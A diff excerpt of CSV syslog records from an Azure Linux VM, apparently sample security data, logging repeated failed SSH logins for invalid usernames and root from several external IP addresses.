+18465,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:20:00,UbuntuDevEnv,2019-06-26 10:19:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,83109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18466,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:20:00,UbuntuDevEnv,2019-06-26 10:19:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,83109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18467,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:20:02,UbuntuDevEnv,2019-06-26 10:20:01,auth,UbuntuDevEnv,info,Failed password for invalid user ez from 200.209.174.76 port 47434 ssh2,83109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,200.209.174.7,47434,,
+18468,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:20:02,UbuntuDevEnv,2019-06-26 10:20:02,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 47434:11: Bye Bye [preauth],83109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,47434,,
+18469,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:20:02,UbuntuDevEnv,2019-06-26 10:20:02,auth,UbuntuDevEnv,info,Disconnected from invalid user ez 200.209.174.76 port 47434 [preauth],83109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,200.209.174.7,47434,,
+18470,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:10,UbuntuDevEnv,2019-06-26 10:21:10,auth,UbuntuDevEnv,info,Invalid user michel from 37.59.6.106 port 33960,83445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,michel,37.59.6.1,33960,,
+18471,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:10,UbuntuDevEnv,2019-06-26 10:21:10,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,83445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:10,UbuntuDevEnv,2019-06-26 10:21:10,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,83445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:12,UbuntuDevEnv,2019-06-26 10:21:11,auth,UbuntuDevEnv,info,Failed password for invalid user michel from 37.59.6.106 port 33960 ssh2,83445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,michel,37.59.6.1,33960,,
+18474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:12,UbuntuDevEnv,2019-06-26 10:21:11,auth,UbuntuDevEnv,info,Disconnected from invalid user michel 37.59.6.106 port 33960 [preauth],83445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,michel,37.59.6.1,33960,,
+18475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:12,UbuntuDevEnv,2019-06-26 10:21:11,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 33960:11: Bye Bye [preauth],83445,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,33960,,
+18476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:53,UbuntuDevEnv,2019-06-26 10:21:52,auth,UbuntuDevEnv,info,Invalid user bukkit from 200.209.174.76 port 53468,83592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,200.209.174.7,53468,,
+18477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:53,UbuntuDevEnv,2019-06-26 10:21:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,83592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:53,UbuntuDevEnv,2019-06-26 10:21:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,83592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:54,UbuntuDevEnv,2019-06-26 10:21:54,auth,UbuntuDevEnv,info,Invalid user bukkit from 47.44.115.81 port 59356,83602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,47.44.115.8,59356,,
+18480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:54,UbuntuDevEnv,2019-06-26 10:21:54,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,83602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:54,UbuntuDevEnv,2019-06-26 10:21:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,83602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:55,UbuntuDevEnv,2019-06-26 10:21:54,auth,UbuntuDevEnv,info,Failed password for invalid user bukkit from 200.209.174.76 port 53468 ssh2,83592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,200.209.174.7,53468,,
+18483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:55,UbuntuDevEnv,2019-06-26 10:21:54,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 53468:11: Bye Bye [preauth],83592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,53468,,
+18484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:55,UbuntuDevEnv,2019-06-26 10:21:54,auth,UbuntuDevEnv,info,Disconnected from invalid user bukkit 200.209.174.76 port 53468 [preauth],83592,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,200.209.174.7,53468,,
+18485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:56,UbuntuDevEnv,2019-06-26 10:21:56,auth,UbuntuDevEnv,info,Failed password for invalid user bukkit from 47.44.115.81 port 59356 ssh2,83602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,47.44.115.8,59356,,
+18486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:56,UbuntuDevEnv,2019-06-26 10:21:56,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 59356:11: Bye Bye [preauth],83602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,59356,,
+18487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:21:56,UbuntuDevEnv,2019-06-26 10:21:56,auth,UbuntuDevEnv,info,Disconnected from invalid user bukkit 47.44.115.81 port 59356 [preauth],83602,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bukkit,47.44.115.8,59356,,
+18488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:38,UbuntuDevEnv,2019-06-26 10:22:37,auth,UbuntuDevEnv,info,Invalid user ts3 from 37.59.6.106 port 50878,83758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,37.59.6.1,50878,,
+18489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:38,UbuntuDevEnv,2019-06-26 10:22:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,83758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:38,UbuntuDevEnv,2019-06-26 10:22:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,83758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:38,UbuntuDevEnv,2019-06-26 10:22:38,auth,UbuntuDevEnv,info,Disconnected from 205.185.118.61 port 41300 [preauth],83761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,205.185.118.6,41300,,
+18492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:38,UbuntuDevEnv,2019-06-26 10:22:38,auth,UbuntuDevEnv,info,Received disconnect from 205.185.118.61 port 41300:11: Bye Bye [preauth],83761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,205.185.118.6,41300,,
+18493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:40,UbuntuDevEnv,2019-06-26 10:22:40,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 37.59.6.106 port 50878 ssh2,83758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,37.59.6.1,50878,,
+18494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:40,UbuntuDevEnv,2019-06-26 10:22:40,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 50878:11: Bye Bye [preauth],83758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,50878,,
+18495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:22:40,UbuntuDevEnv,2019-06-26 10:22:40,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 37.59.6.106 port 50878 [preauth],83758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,37.59.6.1,50878,,
+18496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:23:15,UbuntuDevEnv,2019-06-26 10:23:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76  user=root,83888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,200.209.174.7,,0,
+18497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:23:17,UbuntuDevEnv,2019-06-26 10:23:16,auth,UbuntuDevEnv,info,Failed password for root from 200.209.174.76 port 57695 ssh2,83888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,57695,,
+18498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:23:17,UbuntuDevEnv,2019-06-26 10:23:16,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 57695:11: Bye Bye [preauth],83888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,57695,,
+18499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:23:17,UbuntuDevEnv,2019-06-26 10:23:16,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 200.209.174.76 port 57695 [preauth],83888,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,200.209.174.7,57695,,
+18500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:05,UbuntuDevEnv,2019-06-26 10:24:04,auth,UbuntuDevEnv,info,Invalid user zachary from 37.59.6.106 port 39554,84068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zachary,37.59.6.1,39554,,
+18501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:05,UbuntuDevEnv,2019-06-26 10:24:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,84068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:05,UbuntuDevEnv,2019-06-26 10:24:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:07,UbuntuDevEnv,2019-06-26 10:24:06,auth,UbuntuDevEnv,info,Failed password for invalid user zachary from 37.59.6.106 port 39554 ssh2,84068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zachary,37.59.6.1,39554,,
+18504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:07,UbuntuDevEnv,2019-06-26 10:24:06,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 39554:11: Bye Bye [preauth],84068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,39554,,
+18505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:07,UbuntuDevEnv,2019-06-26 10:24:06,auth,UbuntuDevEnv,info,Disconnected from invalid user zachary 37.59.6.106 port 39554 [preauth],84068,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zachary,37.59.6.1,39554,,
+18506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:08,UbuntuDevEnv,2019-06-26 10:24:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:08,UbuntuDevEnv,2019-06-26 10:24:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,84067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:08,UbuntuDevEnv,2019-06-26 10:24:07,auth,UbuntuDevEnv,info,Invalid user opentsp from 47.44.115.81 port 48374,84067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opentsp,47.44.115.8,48374,,
+18509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:10,UbuntuDevEnv,2019-06-26 10:24:10,auth,UbuntuDevEnv,info,Failed password for invalid user opentsp from 47.44.115.81 port 48374 ssh2,84067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opentsp,47.44.115.8,48374,,
+18510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:10,UbuntuDevEnv,2019-06-26 10:24:10,auth,UbuntuDevEnv,info,Disconnected from invalid user opentsp 47.44.115.81 port 48374 [preauth],84067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,opentsp,47.44.115.8,48374,,
+18511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:10,UbuntuDevEnv,2019-06-26 10:24:10,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 48374:11: Bye Bye [preauth],84067,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,48374,,
+18512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:37,UbuntuDevEnv,2019-06-26 10:24:36,auth,UbuntuDevEnv,info,Invalid user transfer from 200.209.174.76 port 33690,84176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,200.209.174.7,33690,,
+18513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:37,UbuntuDevEnv,2019-06-26 10:24:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:37,UbuntuDevEnv,2019-06-26 10:24:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,84176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:39,UbuntuDevEnv,2019-06-26 10:24:38,auth,UbuntuDevEnv,info,Failed password for invalid user transfer from 200.209.174.76 port 33690 ssh2,84176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,200.209.174.7,33690,,
+18516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:39,UbuntuDevEnv,2019-06-26 10:24:38,auth,UbuntuDevEnv,info,Disconnected from invalid user transfer 200.209.174.76 port 33690 [preauth],84176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,200.209.174.7,33690,,
+18517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:24:39,UbuntuDevEnv,2019-06-26 10:24:38,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 33690:11: Bye Bye [preauth],84176,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,33690,,
+18518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:34,UbuntuDevEnv,2019-06-26 10:25:34,auth,UbuntuDevEnv,info,Invalid user ethos from 37.59.6.106 port 56488,84387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,37.59.6.1,56488,,
+18519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:34,UbuntuDevEnv,2019-06-26 10:25:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:34,UbuntuDevEnv,2019-06-26 10:25:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,84387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:36,UbuntuDevEnv,2019-06-26 10:25:35,auth,UbuntuDevEnv,info,Invalid user murai1 from 188.226.250.187 port 56719,84384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,murai1,188.226.250.1,56719,,
+18522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:36,UbuntuDevEnv,2019-06-26 10:25:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,84384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:36,UbuntuDevEnv,2019-06-26 10:25:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.226.250.187,84384,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,188.226.250.1,,0,
+18524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:25:36,UbuntuDevEnv,2019-06-26 10:25:36,auth,UbuntuDevEnv,info,Failed password for invalid user ethos from 37.59.6.106 port 56488 ssh2,84387,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ethos,37.59.6.1,56488,,
